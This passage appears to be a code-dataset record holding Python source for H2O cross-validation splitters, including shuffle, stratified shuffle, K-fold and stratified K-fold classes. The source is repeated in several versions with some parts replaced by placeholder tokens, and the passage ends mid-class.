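test_folds = np.zeros(len(target), dtype=int)

for cls in np.unique(target):
    cls_idx = np.where(target == cls)[0]
    # assign members of this class round-robin to folds 0..n_folds-1,
    # which keeps each fold's class ratio close to the global ratio
    test_folds[cls_idx] = np.arange(len(cls_idx)) % n_folds

for i in range(n_folds):
    print(i, np.where(test_folds == i)[0])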
\n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. 
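The core of the shuffle split's _iter_indices is a single permutation sliced twice: the first n_test entries become the test set, the next n_train the train set, so the two are disjoint by construction. A sketch with the counts hard-coded rather than derived via _validate_shuffle_split, whose internals are not shown here:

import numpy as np

n_samples, n_test, n_train = 10, 2, 8
rng = np.random.RandomState(42)          # mirrors check_random_state(42)

permutation = rng.permutation(n_samples)
ind_test = permutation[:n_test]
ind_train = permutation[n_test:n_test + n_train]

print(sorted(ind_test), sorted(ind_train))
assert not set(ind_test) & set(ind_train)   # disjoint by construction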
The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. 
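The allocation arithmetic above (p_i, n_i, t_i) decides how many train and test rows each class receives, and the np.minimum guard keeps a class from owing more test rows than it has left after the train draw. Worked through with made-up counts:

import numpy as np

class_counts = np.array([50, 30, 20])    # hypothetical class sizes
n_samples = class_counts.sum()           # 100
n_train, n_test = 70, 30

p_i = class_counts / float(n_samples)            # [0.5, 0.3, 0.2]
n_i = np.round(n_train * p_i).astype(int)        # [35, 21, 14] train rows
t_i = np.minimum(class_counts - n_i,
                 np.round(n_test * p_i).astype(int))   # [15, 9, 6] test rows

# rounding shortfalls, if any, are topped up later from undrawn indices
print(n_i, t_i, n_i.sum() + t_i.sum())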
Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. 
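The @overrides(...) decorator used on split and get_n_splits above is not shown in this section; a plausible minimal re-implementation (purely an assumption about its behavior) just asserts at definition time that the named base really has a method of that name:

def overrides(base):
    """Hypothetical sketch: verify the wrapped method's name exists on
    `base`, then return the method unchanged."""
    def wrapper(method):
        assert hasattr(base, method.__name__), (
            '%s does not override anything on %s' % (method.__name__, base))
        return method
    return wrapper

class A(object):
    def split(self):
        return 'a'

class B(A):
    @overrides(A)
    def split(self):
        return 'b'

print(B().split())   # 'b'; a typo'd method name would fail at class creation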
The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n <docstring token>\n <function token>\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield list(train_index), list(test_index)\n\n def _iter_test_masks(self, frame, y=None):\n \"\"\"Generates boolean masks corresponding to the tests set.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n\n Returns\n -------\n\n test_mask : np.ndarray, shape=(n_samples,)\n The indices for the test split\n \"\"\"\n for test_index in self._iter_test_indices(frame, y):\n test_mask = np.zeros(frame.shape[0], dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n <function token>\n\n @abstractmethod\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the cross validator.\n \"\"\"\n pass\n\n def __repr__(self):\n return _build_repr(self)\n\n\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. 
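Once _make_test_folds has stamped every row with a fold id, _iter_test_masks is a one-liner per fold (test_folds == i), and the base class turns each boolean mask back into index lists. A compact sketch of that last step:

import numpy as np

test_folds = np.array([0, 1, 0, 2, 1, 2])   # made-up fold ids
indices = np.arange(len(test_folds))

for i in range(3):
    test_mask = test_folds == i
    train_index = indices[np.logical_not(test_mask)]
    test_index = indices[test_mask]
    print(i, list(train_index), list(test_index))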
\n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. 
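check_random_state (sklearn's utility, imported by this module) normalizes the three accepted random_state forms, which is why every _iter_indices can treat rng uniformly. A quick demonstration (requires scikit-learn):

import numpy as np
from sklearn.utils import check_random_state

print(type(check_random_state(None)))    # global RandomState singleton
print(type(check_random_state(42)))      # fresh RandomState seeded with 42
rng = np.random.RandomState(7)
print(check_random_state(rng) is rng)    # True: passed through unchanged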
The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. 
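The top-up branch above deserves a closer look: bincount(train + test, minlength=len(target)) marks row indices that were never drawn, and the zero-count ones are shuffled and appended until the requested sizes are met. Isolated with made-up numbers (the class guards the slices with `if n_missing_* > 0`, which these numbers satisfy):

import numpy as np

n = 10
train, test = [0, 1, 2, 3], [4, 5]   # made-up draw, 4 rows short of 7 + 3
n_train, n_test = 7, 3

missing = np.where(np.bincount(train + test, minlength=n) == 0)[0]
missing = np.random.RandomState(0).permutation(missing)

train = list(train) + list(missing[: n_train - len(train)])
test = list(test) + list(missing[-(n_test - len(test)):])
print(sorted(train), sorted(test))   # 7 train rows, 3 test rows, disjoint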
Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. 
The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n <docstring token>\n <function token>\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield list(train_index), list(test_index)\n\n def _iter_test_masks(self, frame, y=None):\n \"\"\"Generates boolean masks corresponding to the tests set.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n\n Returns\n -------\n\n test_mask : np.ndarray, shape=(n_samples,)\n The indices for the test split\n \"\"\"\n for test_index in self._iter_test_indices(frame, y):\n test_mask = np.zeros(frame.shape[0], dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n <function token>\n\n @abstractmethod\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the cross validator.\n \"\"\"\n pass\n <function token>\n\n\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. 
\n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. 
The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n 